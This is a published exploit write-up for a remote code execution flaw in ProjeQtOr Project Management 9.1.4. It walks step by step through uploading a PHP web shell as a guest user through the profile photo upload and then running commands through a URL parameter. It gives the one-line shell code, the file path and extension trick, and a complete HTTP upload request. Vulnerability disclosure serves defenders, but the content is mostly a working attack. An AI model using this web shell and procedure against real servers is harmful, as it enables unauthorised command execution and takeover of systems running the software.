ProjeQtOr Project Management 9.1.4 Shell Upload

ProjeQtOr Project Management version 9.1.4 suffers from a remote shell upload vulnerability.

MD5 | c339c240029d0206837f21f8c4bf2f70

# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution
# Date: 29.05.2021
# Exploit Author: Temel Demir
# Vendor Homepage:
# Software Link:
# Version: v9.1.4
# Tested on: Laragon @WIN10
# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section.

PoC Process Step_by_Step:

# 1) Create a file with the below php code and save it as demir.pHp

<?php echo shell_exec($_GET['key'].' 2>&1'); ?>

# 2) Login to ProjeQtOr portal as guest user
# 3) Click -profile- button on header panel.
# 4) Click -add photo- button and chose upload section and browse your demir.pHp file.
# 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )
# 6) As a last step you have to add the ".projeqtor" statement to the file extension.
You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor

# 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]

Example Request:

POST /project/tool/saveAttachment.php HTTP/1.1
Host: ip:port
Content-Length: 1196
Accept: application/json
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Origin: http://ip:port/website_location/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://ip:port/website_location/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)
Connection: close

Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp"
Content-Type: application/octet-stream

<?php echo shell_exec($_GET['key'].' 2>&1'); ?>
Content-Disposition: form-data; name="attachmentId"

Content-Disposition: form-data; name="attachmentRefType"

Content-Disposition: form-data; name="attachmentRefId"

($your_profile_id //edit)
Content-Disposition: form-data; name="attachmentType"

Content-Disposition: form-data; name="MAX_FILE_SIZE"

Content-Disposition: form-data; name="attachmentLink"

Content-Disposition: form-data; name="attachmentDescription"

Content-Disposition: form-data; name="attachmentPrivacy"

Content-Disposition: form-data; name="uploadType"


Related Posts